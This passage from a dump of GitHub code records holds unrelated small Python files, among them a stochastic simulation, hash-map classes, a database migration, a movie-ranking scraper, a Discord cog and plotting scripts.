np.floor(np.random.uniform(0,1)*t_error/dt)\n for j in range(time_shift):\n x0_tmp = x0_tmp - dt*x0_tmp/(1+j*dt) + np.random.normal(0,1,dim) * np.sqrt(2*dt)\n \n x[0,:] = x0_tmp\n obs[0,0], obs[0,1:] = 0, x0_tmp + np.random.normal(0,1,dim)*m_error\n for j in range(n_sample):\n x[j+1,:] = x[j,:] - dt*x[j,:]/(1+(j+time_shift)*dt) + np.random.normal(0,1,dim) * np.sqrt(2*dt)\n obs[j+1,0], obs[j+1,1:] = (j+1)*dt, x[j+1,:] + np.random.normal(0,1,dim) * m_error\n\n # Write to the output file \n output_writer.writerows(obs)\n \n\ndef adaptation(data_id, n_traj, n_sample, dt=10**(-5), m_error=0, t_error=0, rand_seed=0):\n np.random.seed(rand_seed)\n dim = 2\n tau_a = 0.02\n tau_m = 0.2\n alpha = 2.7\n A = np.array([[-1/tau_a, (1/tau_a) * alpha],\n [-1/tau_m, 0]]).transpose()\n Tm = 0.005\n Ta0 = 0.005\n D0 = np.array([[Ta0, 0],\n [0, Tm]])\n Ta1 = 0.5\n D1 = np.array([[Ta1, 0],\n [0, Tm]])\n lt = 0.01\n L = np.array([-lt*dt/tau_a, 0])\n \n x0 = np.zeros(dim)\n x0_tmp = np.zeros(dim)\n x = np.zeros((n_sample+1, dim))\n obs = np.zeros((n_sample+1, dim+1))\n output_file = open('Data/data' + str(data_id) + '.txt', 'w')\n output_writer = csv.writer(output_file, delimiter=' ')\n\n # Relaxation\n for i in range(100000):\n x0 = x0 + dt*np.matmul(x0, A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D0*dt))\n\n # Generate trajectory data\n for i in range(n_traj):\n # Relaxation\n for j in range(1000):\n x0 = x0 + dt*np.matmul(x0, A) + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D0*dt))\n x0_tmp[:] = x0\n \n # Synchronization error\n if t_error > 0:\n time_shift = np.floor(np.random.uniform(0, 1)*t_error/dt)\n for j in range(time_shift):\n x0_tmp = x0_tmp + dt*np.matmul(x0_tmp, A) + L + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D1*dt))\n \n x[0,:] = x0_tmp\n obs[0,0], obs[0,1:] = 0, x0_tmp + np.random.normal(0,1,dim)*m_error\n for j in range(n_sample):\n x[j+1,:] = x[j,:] + dt*np.matmul(x[j,:], A) + L + np.matmul(np.random.normal(0,1,dim), np.sqrt(2*D1*dt))\n obs[j+1,0], obs[j+1,1:] = (j+1)*dt, x[j+1,:] + np.random.normal(0,1,dim)*m_error\n\n # Write to the output file\n output_writer.writerows(obs)\n\n\ndef epr_breathing_parabola(t):\n return (t**2 * (3 + 3*t + t**2)**2)/(3 * (1+t)**4 * (3 + 6*t + 6*t**2 + 2*t**3))\n\n \ndef epr_adaptation(t):\n return ((np.exp(-50*t) * (-63998940689442 + 6243520070815830*np.exp(50*t) - 171111379578637905*np.exp(100*t)\n + 24029699524871040*np.exp(150*t) - 1441667880822810*np.exp(200*t)\n + 44383810651556*np.exp(250*t) - 400*np.exp(25*t)\n * (192119202 - 13163076234*np.exp(50*t) + 276431059773*np.exp(100*t)\n - 34658515386*np.exp(150*t) + 842869282*np.exp(200*t))*np.cos(5*np.sqrt(2)*t)\n + 12.5*(4432189990140 - 625426775264016*np.exp(50*t) + 19698898382037369*np.exp(100*t)\n -2423603367706752*np.exp(150*t) + 102783600112652*np.exp(200*t))*np.cos(10*np.sqrt(2)*t)\n - 4715653140000*np.exp(75*t)*np.cos(15*np.sqrt(2)*t) + 151830378315000*np.exp(125*t)*np.cos(15*np.sqrt(2)*t)\n - 12837027060000*np.exp(175*t)*np.cos(15*np.sqrt(2)*t) + 1638224935503750*np.exp(50*t)*np.cos(20*np.sqrt(2)*t)\n - 87205888691521875*np.exp(100*t)*np.cos(20*np.sqrt(2)*t) + 6501171027285000*np.exp(150*t)*np.cos(20*np.sqrt(2)*t)\n - 42571868625000*np.exp(125*t)*np.cos(25*np.sqrt(2)*t) + 23805931750734375/2.*np.exp(100*t)*np.cos(30*np.sqrt(2)*t)\n + 845324488800*np.sqrt(2)*np.exp(25*t)*np.sin(5*np.sqrt(2)*t) - 20580429909600*np.sqrt(2)*np.exp(75*t)*np.sin(5*np.sqrt(2)*t)\n + 521418308281200*np.sqrt(2)*np.exp(125*t)*np.sin(5*np.sqrt(2)*t) - 66720192818400*np.sqrt(2)*np.exp(175*t)*np.sin(5*np.sqrt(2)*t)\n + 2381271640800*np.sqrt(2)*np.exp(225*t)*np.sin(5*np.sqrt(2)*t) + 16356068262270*np.sqrt(2)*np.sin(10*np.sqrt(2)*t)\n - 1456450488965340*np.sqrt(2)*np.exp(50*t)*np.sin(10*np.sqrt(2)*t)\n + 74369430767428335/np.sqrt(2)*np.exp(100*t)*np.sin(10*np.sqrt(2)*t)\n - 4249583374522860*np.sqrt(2)*np.exp(150*t)*np.sin(10*np.sqrt(2)*t)\n + 156745750241070*np.sqrt(2)*np.exp(200*t)*np.sin(10*np.sqrt(2)*t)\n + 4715653140000*np.sqrt(2)*np.exp(75*t)*np.sin(15*np.sqrt(2)*t)\n - 224367579315000*np.sqrt(2)*np.exp(125*t)*np.sin(15*np.sqrt(2)*t)\n + 18393897060000*np.sqrt(2)*np.exp(175*t)*np.sin(15*np.sqrt(2)*t)\n + 647934380057250*np.sqrt(2)*np.exp(50*t)*np.sin(20*np.sqrt(2)*t)\n - 27461903641202250*np.sqrt(2)*np.exp(100*t)*np.sin(20*np.sqrt(2)*t)\n + 1894339815860250*np.sqrt(2)*np.exp(150*t)*np.sin(20*np.sqrt(2)*t)\n + 33640707375000*np.sqrt(2)*np.exp(125*t)*np.sin(25*np.sqrt(2)*t)\n + 12131083093696875/np.sqrt(2)*np.exp(100*t)*np.sin(30*np.sqrt(2)*t)))\n / (800 * (9801 - 339471*np.exp(50*t) + 26129*np.exp(100*t) + 304425*np.exp(50*t)*np.cos(10*np.sqrt(2)*t)\n + 24750*np.sqrt(2)*np.exp(50*t)*np.sin(10*np.sqrt(2)*t))**2))\n\n","repo_name":"tsuboshun/LearnEntropy","sub_path":"toy.py","file_name":"toy.py","file_ext":"py","file_size_in_byte":9217,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"70595127468","text":"\"\"\"empty message\n\nRevision ID: 09881542d9ee\nRevises: 136d98670f2c\nCreate Date: 2018-02-27 12:09:01.908597\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '09881542d9ee'\ndown_revision = '136d98670f2c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('training',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('bot_guid', sa.String(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('trained_at', sa.DateTime(), nullable=True),\n sa.Column('train_time', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['bot_guid'], ['bots.bot_guid'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('training')\n # ### end Alembic commands ###\n","repo_name":"GanadiniAkshay/Nacer-NLP","sub_path":"migrations/versions/09881542d9ee_.py","file_name":"09881542d9ee_.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9705230303","text":"from collections import MutableMapping\nfrom random import randrange\n\nclass MapBase(MutableMapping):\n \"\"\"Abstract Map base class that includes a nonpublic _Item class.\"\"\"\n\n class _Item:\n \"\"\"Lightweight composite to store key-value pairs as map items.\"\"\"\n __slots__ = \"_key\", \"_value\"\n\n def __init__(self, k, v):\n self._key = k\n self._value = v\n\n def __eq__(self, rhs):\n return self._key == rhs._key\n\n def __ne__(self, rhs):\n return not (self == rhs)\n\n def __lt__(self, rhs):\n return self._key < rhs._key\n\nclass UnsortedTableMap(MapBase):\n \"\"\"Inefficient Map implementation using an unordered list.\"\"\"\n\n def __init__(self):\n \"\"\"Create an empty map.\"\"\"\n self._table = []\n\n def __getitem__(self, k): # O(n)\n \"\"\"Return value associated with key k (raise KeyError if not\n found).\"\"\"\n for item in self._table:\n if k == item._key:\n return item._value\n raise KeyError(\"Key Error: \" + repr(k))\n\n def __setitem__(self, k, v): # O(n)\n \"\"\"Assign value v to key k, overwriting existing value if present.\"\"\"\n for item in self._table:\n if k == item._key:\n item._value = v\n return\n self._table.append(self._Item(k, v))\n\n def __delitem__(self, k): # O(n)\n \"\"\"Remove item associated with key k (raise KeyError if not found).\"\"\"\n for j in range(len(self._table)):\n if k == self._table[j]._key:\n self._table.pop(j)\n return\n raise KeyError(\"Key Error: \" + repr(k))\n\n def __len__(self):\n \"\"\"Return number of items in the map.\"\"\"\n return len(self._table)\n\n def __iter__(self):\n \"\"\"Generate iteration of the map's keys.\"\"\"\n for item in self._table:\n yield item._key\n\ndef hash_code(s):\n \"\"\"Return cyclic-shift hash code for string s.\"\"\"\n mask = (1<<32) - 1\n h = 0\n for character in s:\n h = (h << 5 & mask) | (h >> 27)\n h += ord(character)\n return h\n\nclass HashMapBase(MapBase):\n \"\"\"Abstract base class for map using hash-table with MAD (Multiply, Add\n and Divide) compression.\"\"\"\n\n def __init__(self, cap=11, p=109345121):\n self._table = cap * [None]\n self._n = 0 # number of entries in the map\n self._prime = p # prime for MAD compression\n self._scale = 1 + randrange(p-1) # scale from 1 to p-1 for MAD\n self._shift = randrange(p) # shift from 0 to p-1 for MAD\n\n def _hash_function(self, k):\n return (hash(k) * self._scale + self._shift)\\\n % self._prime % len(self._table)\n\n def __len__(self):\n return self._n\n\n def __getitem__(self, k):\n j = self._hash_function(k)\n return self._bucket_getitem(j, k) # may raise KeyError\n\n def __setitem__(self, k, v):\n j = self._hash_function(k)\n self._bucket_setitem(j, k, v) # subroutine maintains self._n\n if self._n > len(self._table) // 2: # keep load factor <= 0.5\n self._resize(2 * len(self._table) + 1)\n\n def __delitem__(self, k):\n j = self._hash_function(k)\n self._bucket_delitem(j, k) # may raise KeyError\n self._n -= 1\n\n def _resize(self, c): # Resize bucket array to capacity c\n old = list(self.items())\n self._table = c * [None]\n self._n = 0\n for (k, v) in old:\n self[k] = v\n\nclass ChainHashMap(HashMapBase):\n \"\"\"Hash map implemented with separate chaining for collision\n resolution.\"\"\"\n\n def _bucket_getitem(self, j, k):\n bucket = self._table[j]\n if bucket is None:\n raise KeyError(\"Key Error: \" + repr(k))\n return bucket[k] # may raise KeyError\n\n def _bucket_setitem(self, j, k, v):\n if self._table[j] is None:\n self._table[j] = UnsortedTableMap()\n oldsize = len(self._table[j])\n self._table[j][k] = v\n if len(self._table[j]) > oldsize:\n self._n += 1\n\n def _bucket_delitem(self, j, k):\n bucket = self._table[j]\n if bucket is None:\n raise KeyError(\"Key Error: \" + repr(k))\n del bucket[k]\n\n def __iter__(self):\n for bucket in self._table:\n if bucket is not None:\n for key in bucket:\n yield key\n\nclass ProbeHashMap(HashMapBase):\n \"\"\"Hash map implemented with linear probing ofor collision resolution.\"\"\"\n _AVAIL = object() # sentinal marks locations of previous deletions\n\n def _is_available(self, j):\n \"\"\"Return True if index j is available in table.\"\"\"\n return self._table[j] is None or self._table[j] is ProbeHashMap._AVAIL\n\n def _find_slot(self, j, k):\n \"\"\"Search for k in bucket at index j.\n\n Return (success, index) tuple, described as follows:\n If match was found, success is True and index denotes its location.\n If no match found, success is False and index denotes first available\n slot.\n \"\"\"\n firstAvail = None\n for _ in range(len(self._table)):\n if self._is_available(j):\n if firstAvail is None:\n firstAvail = j\n if self._table[j] is None:\n return (False, firstAvail)\n elif k == self._table[j]._key:\n return (True, j)\n j = (j + 1) % (len(self._table))\n return (False, firstAvail)\n\n def _bucket_getitem(self, j, k):\n found, s = self._find_slot(j, k)\n if not found:\n raise KeyError(\"Key Error: \" + repr(k)) # No match found\n return self._table[s]._value\n\n def _bucket_setitem(self, j, k, v):\n found, s = self._find_slot(j, k)\n if not found:\n self._table[s] = self._Item(k, v)\n self._n += 1\n else:\n self._table[s]._value = v\n\n def _bucket_delitem(self, j, k):\n found, s = self._find_slot(j, k)\n if not found:\n raise KeyError(\"Key Error: \" + repr(k)) # No match found\n self._table[s] = ProbeHashMap._AVAIL # mark as vacated\n\n def __iter__(self):\n for j in range(len(self._table)):\n if not self._is_available(j):\n yield self._table[j]._key\n\nclass SortedTableMap(MapBase):\n \"\"\"Map implementation using a sorted table.\"\"\"\n\n # ---- non-public behaviors ----\n def _find_index(self, k, low, high):\n \"\"\"Return index of the leftmost item with key >= k.\n\n Return high + 1 if no such item qualifies.\n\n That is, j will be returned such that:\n all items of slice table[low, j] have key < k\n all items of slice table[j, high+1] have key >= k.\n \"\"\"\n if high < low:\n return high + 1\n else:\n mid = (low + high) // 2\n if k == self._table[mid]._key:\n return mid\n elif k < self._table[mid]._key:\n return self._find_index(k, low, mid - 1)\n else:\n return self._find_index(k, mid + 1, high)\n\n # ---- public behaviors ----\n def __init__(self):\n \"\"\"Create an empty map.\"\"\"\n self._table = []\n\n def __len__(self):\n \"\"\"Return number of items in the map.\"\"\"\n return len(self._table)\n\n def __getitem__(self, k):\n \"\"\"Return value associated with key k (raise KeyError if not\n found).\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j == len(self._table) or self._table[j]._key != k:\n raise KeyError(\"Key Error: \" + repr(k))\n return self._table[j]._value\n\n def __setitem__(self, k, v):\n \"\"\"Assign value v to key k, overwriting existing value if present.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j < len(self._table) and self._table[j]._key == k:\n self._table[j]._value = v\n else:\n self._table.insert(j, self._Item(k, v)) # add new item\n\n def __delitem__(self, k):\n \"\"\"Remove item associated with key k (raise KeyError if not found).\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j == len(self._table) or self._table[j]._key != k:\n raise KeyError(\"Key Error: \" + repr(k))\n self._table.pop(j)\n\n def __iter__(self):\n \"\"\"Generate keys of the map ordered from minimum to maximum.\"\"\"\n for item in self._table:\n yield item._key\n\n def __reversed__(self):\n \"\"\"Generate keys of the map ordered from maximum to minimum.\"\"\"\n for item in reversed(self._table):\n yield item._key\n\n def find_min(self):\n \"\"\"Return (k, v) pair with minimum key (or None if empty).\"\"\"\n if len(self._table) > 0:\n return (self._table[0]._key, self._table[0]._value)\n else:\n return None\n\n def find_max(self):\n \"\"\"Return (k, v) pair with maximum key (or None if empty).\"\"\"\n if len(self._table) > 0:\n return (self._table[-1]._key, self._table[-1]._value)\n else:\n return None\n\n def find_ge(self, k):\n \"\"\"Return (k, v) pair with least key >= k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j < len(self._table):\n return (self._table[j]._key, self._table[j]._value)\n else:\n return None\n\n def find_lt(self, k):\n \"\"\"Return (k, v) pair with greatest key < k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j > 0:\n return (self._table[j-1]._key, self._table[j-1]._value)\n else:\n return None\n\n def find_gt(self, k):\n \"\"\"Return (k, v) pair with least key > k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if j < len(self._table) and self._table[j]._key == k:\n j += 1 # advance past match\n if j < len(self._table):\n return (self._table[j]._key, self._table[j]._value)\n else:\n return None\n\n def find_le(self, k):\n \"\"\"Return (k, v) pair with greatest key <= k.\"\"\"\n j = self._find_index(k, 0, len(self._table) - 1)\n if (j < len(self._table) and self._table[j]._key != k)\\\n or j == len(self._table):\n j -= 1\n if j >= 0:\n return (self._table[j]._key, self._table[j]._value)\n else:\n return None\n\n def find_range(self, start, stop):\n \"\"\"Iterate all (k, v) pairs such that start <= key < stop\n\n If start is None, iteration begins with minimum key of map.\n If stop is None, iteration continues through the maximum key of map.\n \"\"\"\n if start is None:\n j = 0\n else:\n j = self._find_index(start, 0, len(self._table) - 1)\n while j < len(self._table) and (stop is None or \\\n self._table[j]._key < stop):\n yield (self._table[j]._key, self._table[j]._value)\n j += 1\n","repo_name":"storypku/tlpi","sub_path":"Data.Structures.and.Algorithms.in.Python/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"25541182290","text":"#!/usr/bin/python3\n\nimport glob\nimport os\n#get the hpp_files\nfiles = glob.glob('src/**/*.hpp', recursive=True)\n\nmodified_files = []\nfor file in files:\n with open(file, \"r+\") as f: \n filename = os.path.basename(file).split(\".\")[0]\n old = f.read()\n f.seek(0)\n first_line = f.readline()\n if filename in first_line and '#ifndef' in first_line:\n continue\n modified_files.append(file)\n filename = \"__\" + filename + \"__\"\n f.seek(0)\n first_line = \"#ifndef \" + filename + \"\\n\" + \"#define \" + filename + \"\\n\"\n last_line = \"\\n#endif\"\n f.write(first_line + old + last_line)\n\nif modified_files:\n print(\"modified the following files:\", modified_files)\nelse:\n print(\"no files modified\")\n ","repo_name":"isaac-castillo/rpg2","sub_path":"scripts/add_headers.py","file_name":"add_headers.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526243737","text":"'''\nFind the nth root of value x.\n'''\n\nclass Prob:\n '''\n Using binary search.\n Time complexity: O(log_2(x)), since the binary search searches initially using [0,x]\n Space complexity: O(1), since the med variable just stores the median after each iteration.\n '''\n @staticmethod\n def nthRoot(n, x):\n lo = 0\n hi = x\n acc = 0.000000001 # accuracy of calculation\n med = hi/2\n while abs(med**n - x) > acc:\n # print(f\"med: {med}, med^n: {med**n}\")\n if med**n > x:\n hi = med\n else:\n lo = med\n med = (lo + hi)/2\n return med\n \n @staticmethod\n def test1(alg):\n n = 3 # root\n # x = 1000\n x = 27\n r = alg(n, x)\n print(\"r: \", r)\n\nalg = Prob.nthRoot\nProb.test1(alg)","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/nth_root.py","file_name":"nth_root.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25615165359","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nclass c153(commands.Cog, name=\"c132\"):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n @commands.command(name='Living_Bullet', aliases=['c153'])\n async def example_embed(self, ctx):\n embed = discord.Embed(title='Living Bullet',\n color=0xFDE68A)\n embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2336244.jpg')\n\n embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3', inline=True)\n embed.add_field(name='Type (Attribute)', value='Machine/Normal (EARTH)', inline=False)\n embed.add_field(name='Level (ATK/DEF)', value='7 (2850/2000)', inline=False)\n embed.add_field(name='Lore Text', value='With nothing in its path, this bullet is always known to find its mark. People try to capture and control this bullet, but no man, beast or entity has yet been able to tame the Living Bullet.', inline=False)\n embed.set_footer(text='Set Code: ANCF')\n\n await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n bot.add_cog(c153(bot))","repo_name":"ProfessorSean/Kasutamaiza","sub_path":"upcfcardsearch/c153.py","file_name":"c153.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34715793129","text":"import requests\nimport re\nimport json\nfrom os.path import exists\n\n\n# 获取网页\ndef get_url(url):\n \"\"\"\n 获取网页内容,传入网址\n \"\"\"\n headers = {\n 'User-agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'\n }\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n return response.text\n else:\n return None\n\n\ndef write_into_txt(txt):\n \"\"\"\n 保存数据,传入获得的网页内容\n \"\"\"\n with open('E:\\\\computer\\\\Python\\\\programs\\\\爬虫\\\\猫眼爬虫\\\\test.txt',\n 'a',\n encoding='utf-8') as file:\n file.write(txt)\n\n\ndef read_txt(file_name):\n \"\"\"\n 读取数据,传入文件路径\n \"\"\"\n if exists(file_name):\n print(\"> 爬虫文件存在\")\n with open(file_name, 'r', encoding='utf-8') as file:\n content = file.read()\n return content\n return 0\n\n\n# 提取数据\ndef parser_text(html):\n \"\"\"\n 使用正则表达式提取数据;\n 并保存为dic数据;\n 传入读取的数据\n \"\"\"\n pattern = re.compile(\n r'(.*?).*?.*?>(.*?)<.*?class=\"star\">(.*?)<.*?class=\"releasetime\">上映时间:(.*?)

.*?class=\"integer\">(.*?)(.*?)<',\n re.S)\n items = re.findall(pattern, html)\n for item in items:\n dic = {\n '排名': item[0],\n '图片': item[1],\n '电影名称': item[2].strip(),\n '主演': item[3].strip()[3:],\n '上映时间': item[4].strip()[:10],\n '评分': item[5] + item[6]\n }\n print(dic)\n # 存入文件中\n book_list = json.dumps(dic, ensure_ascii=False)\n path = 'E:\\\\computer\\\\Python\\\\programs\\\\爬虫\\\\猫眼爬虫\\\\result.txt'\n with open(path, 'a', encoding='utf-8') as file:\n file.write(book_list + \"\\n\")\n if exists(path):\n print(f\"> 数据结果已经保存至{path}\")\n\n\n# 主函数\ndef main():\n \"\"\"\n 程序入口\n \"\"\"\n for a in range(5):\n num = a * 10\n url = f\"https://maoyan.com/board/4?offset={num}\"\n html = get_url(url)\n write_into_txt(html)\n file = 'E:\\\\computer\\\\Python\\\\programs\\\\爬虫\\\\猫眼爬虫\\\\test.txt'\n html_read = read_txt(file)\n # print(html_read)\n dic = parser_text(html_read)\n print(dic)\n # create_txt(dic)\n # write_into_txt(dic)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"LemonGuai/spider","sub_path":"猫眼爬虫/maoyan_Top10.py","file_name":"maoyan_Top10.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28505750744","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nimport csv\n\n\n# In[9]:\n\n\nwith open('finished-paths-no-back.csv', newline='') as f:\n reader = csv.reader(f)\n fpnb = list(reader)\nf.close()\n\n\n# In[10]:\n\n\nwith open('finished-paths-back.csv', newline='') as f:\n reader = csv.reader(f)\n fpb = list(reader)\nf.close()\n\n\n# In[11]:\n\n\n\n\nresult1=list()\nfor i in range(1,13):\n result1.append(0)\n \n \ntotal1=0\n\nfor i in fpnb:\n diff=int(i[0])-int(i[1])\n if diff>10:\n result1[11]=result1[11]+1\n else:\n result1[diff]=result1[diff]+1\n total1=total1+1\n \n#print(total1) \nfor i in range(0,12):\n result1[i]=(result1[i]*100)/total1\n \n \nresult1=[result1]\n#print(result1)\n\n\n# In[12]:\n\n\nfile = open('percentage-paths-no-back.csv', 'w+', newline ='') \nwith file: \n write = csv.writer(file) \n write.writerows(result1) \nfile.close()\n\n\n# In[13]:\n\n\nresult2=list()\nfor i in range(1,13):\n result2.append(0)\n \n \ntotal2=0 \n\nfor i in fpb:\n diff=int(i[0])-int(i[1])\n if diff>10:\n result2[11]=result2[11]+1\n else:\n result2[diff]=result2[diff]+1\n total2=total2+1\n \n#print(total2) \nfor i in range(0,12):\n result2[i]=(result2[i]*100)/total2\n\nresult2=[result2]\n#print(result2)\n\n\n# In[7]:\n\n\nfile = open('percentage-paths-back.csv', 'w+', newline ='') \nwith file: \n write = csv.writer(file) \n write.writerows(result2) \nfile.close()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"debanjanchatterjee/CS685-data-mining","sub_path":"Assignment 2/percentage-paths-generator.py","file_name":"percentage-paths-generator.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72959723308","text":"import sys\nfrom collections import deque\n\nsys.stdin = open(\"input.txt\", \"rt\")\n\n# 7번 문제. 교육과정 설계\n\n# 내 풀이\n'''\nessential = [x for x in input()]\nn = int(input())\nsubjects = [input() for _ in range(n)]\n\nfor i in range(n):\n tmp = []\n for x in subjects[i]:\n if essential.__contains__(x) and not tmp.__contains__(x):\n tmp.append(x)\n else:\n if tmp == essential:\n print(\"#%d YES\" % (i + 1))\n else:\n print(\"#%d NO\" % (i + 1))\n'''\n\n# 해설\nneed = input()\nn = int(input())\nfor i in range(n):\n plan = input() # 짠 수업표\n dq = deque(need) # deque화\n for x in plan:\n if x in dq: # x가 dq 안에 있다면\n if x != dq.popleft(): # dq에서 popleft 한 값이 x와 다르면\n print(\"#%d NO\" % (i + 1))\n break\n else:\n if len(dq) == 0: # dq에 남은 원소가 있다면 YES, 아니면 NO\n print(\"#%d YES\" & (i + 1))\n else:\n print(\"#%d NO\" & (i + 1))\n\n\n","repo_name":"bansakdo/Algorithm","sub_path":"inflean/Section5/Question07.py","file_name":"Question07.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17737538089","text":"import os\nimport sys\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as pltckr\nimport numpy as np\nfrom statistics import mean\n\nfrom common import DictObject, PresArgParser\n# ------------------------------------------------------------------------------\nclass ArgParser(PresArgParser):\n # --------------------------------------------------------------------------\n def __init__(self, **kw):\n PresArgParser.__init__(self, **kw)\n\n self._add_multi_input_arg()\n# ------------------------------------------------------------------------------\ndef make_argparser():\n return ArgParser(prog=os.path.basename(__file__))\n# ------------------------------------------------------------------------------\ndef _format_time(s, pos=None):\n if s >= 3600:\n h = int(s/3600)\n s -= h*3600\n m = int(s/60)\n s -= m*60\n return \"%2d:%02d:%02d\" % (h, m, s)\n\n m = int(s/60)\n s -= m*60\n return \"%2d:%02d\" % (m, s)\n# ------------------------------------------------------------------------------\ndef do_plot(options):\n\n labels = {\n 0: \"compiler\\nclang-tidy\",\n 1: \"ccache\\nclang-tidy\",\n 2: \"compiler\\nctcache\",\n 3: \"ccache\\nctcache\"\n }\n data = {}\n x_interval = 0.0\n\n for input_path in options.input_path:\n measured = DictObject.loadJson(input_path)\n key = (1 if measured.ccache else 0) + (2 if measured.ctcache else 0)\n try:\n dk = data[key]\n except KeyError:\n dk = data[key] = {\n \"label\": labels[key],\n \"age\": [],\n \"load\": []\n } \n for row in measured.data:\n x_interval = max(x_interval, row.age)\n dk[\"age\"].append(row.age)\n dk[\"load\"].append(row.cpu_load_5)\n\n tick_opts = [5,10,15,30,60]\n for t in tick_opts:\n x_tick_maj = t*60\n if x_interval / x_tick_maj < 12:\n break\n\n plt.style.use('dark_background')\n fig, spl = plt.subplots()\n options.initialize(plt, fig)\n\n for k, dk in data.items():\n x = dk[\"age\"]\n y = dk[\"load\"]\n spl.plot(\n x, y,\n label=dk[\"label\"],\n linewidth=2,\n color=options.color_from_to(k, 0, 3)\n )\n \n spl.xaxis.set_major_locator(pltckr.MultipleLocator(x_tick_maj))\n spl.xaxis.set_major_formatter(pltckr.FuncFormatter(_format_time))\n spl.set_xlabel(\"Build time\")\n spl.set_ylabel(\"CPU load\")\n spl.grid(axis=\"both\", alpha=0.25)\n spl.legend()\n\n options.finalize(plt)\n# ------------------------------------------------------------------------------\ndef main():\n do_plot(make_argparser().make_options())\n return 0\n# ------------------------------------------------------------------------------\nif __name__ == \"__main__\":\n exit(main())\n# ------------------------------------------------------------------------------\n","repo_name":"matus-chochlik/ctcache","sub_path":"doc/latex/tools/plot-system-load.py","file_name":"plot-system-load.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"37"} +{"seq_id":"34806198808","text":"import car_manager\n\nFONT = (\"Courier\", 24, \"normal\")\nfrom turtle import Turtle\nfrom car_manager import CarManager\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.score = 0\n self.penup()\n self.hideturtle()\n self.goto(-50, 250)\n self.display_score()\n def increment_score(self):\n self.score+=1\n self.display_score()\n\n def display_score(self):\n self.clear()\n self.write(f\"Score: {self.score}\", move=False, align='left', font=FONT)\n\n def game_over(self):\n self.goto(-150,0)\n self.write(\"Game Over\", move=False, align='left', font = (\"Courier\", 40, \"bold\"))\n","repo_name":"Aizad-eng/Turtle-crossing-game","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69979144747","text":"def string_correct(text:str)->str:\r\n text_l = list(text)\r\n text_l[0] = text_l[0].capitalize()\r\n if(text[len(text)-1]!='.'):\r\n text_l.append('.')\r\n text = ''.join(text_l)\r\n # if()\r\n # print(text)\r\n # print(text[0])\r\n # print(text[len(text)-1])\r\n\r\nstring_correct(\"lethanhtuan\")","repo_name":"cheaterdxd/my-coding-memory","sub_path":"python-practice-/string_fixed.py","file_name":"string_fixed.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39444463584","text":"from loguru import logger\nfrom pydantic import BaseSettings\n\n\nclass Settings(BaseSettings):\n TG_API_ID: str = None\n TG_API_HASH: str = None\n TYPING_SYMBOL: str = \"▒\"\n TYPING_PAUSE_INTERVAL: float = 0.05\n TYPING_SYMBOL_INTERVAL: float = 0.02\n FLOOD_WAIT_INTERVAL: float = 0.05\n 